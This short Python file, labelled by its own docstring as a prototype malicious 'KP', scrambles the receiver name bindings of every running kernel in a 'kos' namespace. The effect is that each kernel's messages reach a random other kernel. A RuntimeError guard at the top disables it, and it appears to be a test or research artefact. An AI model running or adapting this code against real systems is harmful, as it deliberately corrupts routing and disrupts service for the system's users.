"""A prototype malicious KP.

Scrambles the receiver bindings of all kernels currently
running. After it runs the Receiver object bound in a kernel's
namespace refers to a random kernel (possible the correct one, but
likely a different one).
"""

import nstools
import random

class KP:

    def __main__(self, kos):
        raise RuntimeError, "are you sure you want to run this?"
        world = nstools.WorldOpen('kos')
        receivers = []
        names = {}
        kernels = world.List()
        for kernel in kernels:
            recv = nstools.Lookup(world, '%s/receiver' % kernel)
            receivers.append(recv)
            names[recv] = kernel

        for recv in receivers:
            dest = random.choice(kernels)
            kernels.remove(dest)
            c = nstools.WorldOpen('kos/%s' % dest)
            c.Rebind('receiver', recv)
            print "%s -> %s" % (names[recv], dest)
        
